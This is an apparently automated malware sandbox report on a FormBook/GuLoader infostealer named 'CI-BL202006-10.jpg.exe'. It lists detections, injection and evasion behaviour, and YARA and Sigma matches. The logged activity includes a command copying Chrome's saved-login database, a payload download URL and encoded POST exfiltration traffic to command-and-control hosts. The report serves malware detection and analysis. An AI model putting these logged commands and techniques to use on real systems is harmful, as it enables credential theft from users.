Loading ...

Play interactive tourEdit tour

Analysis Report CI-BL202006-10.jpg.exe

Overview

General Information

Sample Name:CI-BL202006-10.jpg.exe
MD5:0c20e160f37e9433adfc2dc5351a2571
SHA1:a0c2794e0f0a43461da1d73852d0ba78ec9cbb46
SHA256:9381fe0c3cf875295a8f591384aa265f7055886439c2f6879dd31585b7c7e8fc

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses an obfuscated file name to hide its real file extension (double extension)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CI-BL202006-10.jpg.exe (PID: 3608 cmdline: 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: 0C20E160F37E9433ADFC2DC5351A2571)
    • CI-BL202006-10.jpg.exe (PID: 5948 cmdline: 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: 0C20E160F37E9433ADFC2DC5351A2571)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • svchost.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 3836 cmdline: /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3132 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x9644:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16289:$sqlite3step: 68 34 1C 7B E1
    • 0x1639c:$sqlite3step: 68 34 1C 7B E1
    • 0x162b8:$sqlite3text: 68 38 2A 90 C5
    • 0x163dd:$sqlite3text: 68 38 2A 90 C5
    • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8358:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x86f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13e71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x145ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x927a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x130ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      Click to see the 13 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: Steal Google chrome login dataShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 2644, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3132
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2644
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2644

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: CI-BL202006-10.jpg.exeVirustotal: Detection: 29%Perma Link
      Source: CI-BL202006-10.jpg.exeReversingLabs: Detection: 20%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY

      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0280F760 FindFirstFileW,FindNextFileW,FindClose,9_2_0280F760
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0280F759 FindFirstFileW,FindNextFileW,FindClose,9_2_0280F759

      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 5x nop then clc 0_2_001C25C9
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 4x nop then pop edi7_2_0008C1B6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 4x nop then pop edi7_2_0008C20F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 5x nop then clc 7_2_005625C9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi9_2_0280C20F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi9_2_0280C1B6

      Source: global trafficHTTP traffic detected: GET /an0m/?v6Ahr=Y8StOgjefEY/SV/IfIGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwiN5LAcyNwT&Ux=U6oHspOH7x HTTP/1.1Host: www.yr-ct.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /an0m/?v6Ahr=w0B5E3Tixu02ndn4wpbRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAv/xiCLcSa/&Ux=U6oHspOH7x HTTP/1.1Host: www.magentos.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 36 41 68 72 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6b 48 42 49 35 36 46 6f 6d 59 55 56 59 6b 43 53 78 51 4c 69 67 52 4c 63 6b 2d 39 6b 28 51 6c 50 44 59 30 68 31 69 4a 5a 7e 76 70 31 28 55 6b 54 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 75 61 70 6c 34 38 7a 75 65 6a 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: v6Ahr=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMkHBI56FomYUVYkCSxQLigRLck-9k(QlPDY0h1iJZ~vp1(UkT2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6uapl48zuejndjt-Cg).
      Source: global trafficHTTP traffic detected: GET /an0m/?v6Ahr=Y8StOgjefEY/SV/IfIGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwiN5LAcyNwT&Ux=U6oHspOH7x HTTP/1.1Host: www.yr-ct.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /an0m/?v6Ahr=w0B5E3Tixu02ndn4wpbRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAv/xiCLcSa/&Ux=U6oHspOH7x HTTP/1.1Host: www.magentos.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 36 41 68 72 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6b 48 42 49 35 36 46 6f 6d 59 55 56 59 6b 43 53 78 51 4c 69 67 52 4c 63 6b 2d 39 6b 28 51 6c 50 44 59 30 68 31 69 4a 5a 7e 76 70 31 28 55 6b 54 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 75 61 70 6c 34 38 7a 75 65 6a 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: v6Ahr=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMkHBI56FomYUVYkCSxQLigRLck-9k(QlPDY0h1iJZ~vp1(UkT2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6uapl48zuejndjt-Cg).
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Jun 2020 06:58:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 295Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 6e 30 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /an0m/ was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.magentos.info Port 80</address></body></html>
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: svchost.exe, 00000009.00000002.1179348625.0000000002A68000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.1179257260.0000000002A2C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
      Source: explorer.exe, 00000008.00000002.1178314312.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
      Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
      Source: svchost.exe, 00000009.00000002.1179305167.0000000002A55000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000008.00000000.998276822.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: svchost.exe, 00000009.00000002.1181386137.000000000382D000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?fc21fbd0fe5055ebb448b1b503222a26
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=CEA27E82624AB94F&resid=CEA27E82624AB94F%21175&authkey=AGKupoV

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C2A49 NtProtectVirtualMemory,0_2_001C2A49
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C0F78 NtWriteVirtualMemory,0_2_001C0F78
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C01AE EnumWindows,NtSetInformationThread,TerminateProcess,0_2_001C01AE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C2DF6 NtResumeThread,0_2_001C2DF6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C114C NtWriteVirtualMemory,0_2_001C114C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C2DFC NtResumeThread,0_2_001C2DFC
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C01E6 NtSetInformationThread,TerminateProcess,0_2_001C01E6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A750 NtCreateFile,LdrInitializeThunk,7_2_1F45A750
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A700 NtProtectVirtualMemory,LdrInitializeThunk,7_2_1F45A700
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A720 NtResumeThread,LdrInitializeThunk,7_2_1F45A720
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A610 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_1F45A610
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A6A0 NtCreateSection,LdrInitializeThunk,7_2_1F45A6A0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A540 NtDelayExecution,LdrInitializeThunk,7_2_1F45A540
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A560 NtQuerySystemInformation,LdrInitializeThunk,7_2_1F45A560
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A5F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_1F45A5F0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45B470 NtOpenThread,LdrInitializeThunk,7_2_1F45B470
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A410 NtQueryInformationToken,LdrInitializeThunk,7_2_1F45A410
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45ACE0 NtCreateMutant,LdrInitializeThunk,7_2_1F45ACE0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A480 NtMapViewOfSection,LdrInitializeThunk,7_2_1F45A480
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A4A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_1F45A4A0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A360 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_1F45A360
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A3E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_1F45A3E0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A240 NtReadFile,LdrInitializeThunk,7_2_1F45A240
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A2D0 NtClose,LdrInitializeThunk,7_2_1F45A2D0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A710 NtQuerySection,7_2_1F45A710
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A780 NtOpenDirectoryObject,7_2_1F45A780
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A650 NtQueueApcThread,7_2_1F45A650
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A6D0 NtCreateProcessEx,7_2_1F45A6D0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45BD40 NtSuspendThread,7_2_1F45BD40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A520 NtEnumerateKey,7_2_1F45A520
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A5A0 NtWriteVirtualMemory,7_2_1F45A5A0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A460 NtOpenProcess,7_2_1F45A460
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A470 NtSetInformationFile,7_2_1F45A470
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45B410 NtOpenProcessToken,7_2_1F45B410
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A430 NtQueryVirtualMemory,7_2_1F45A430
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A350 NtQueryValueKey,7_2_1F45A350
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A370 NtQueryInformationProcess,7_2_1F45A370
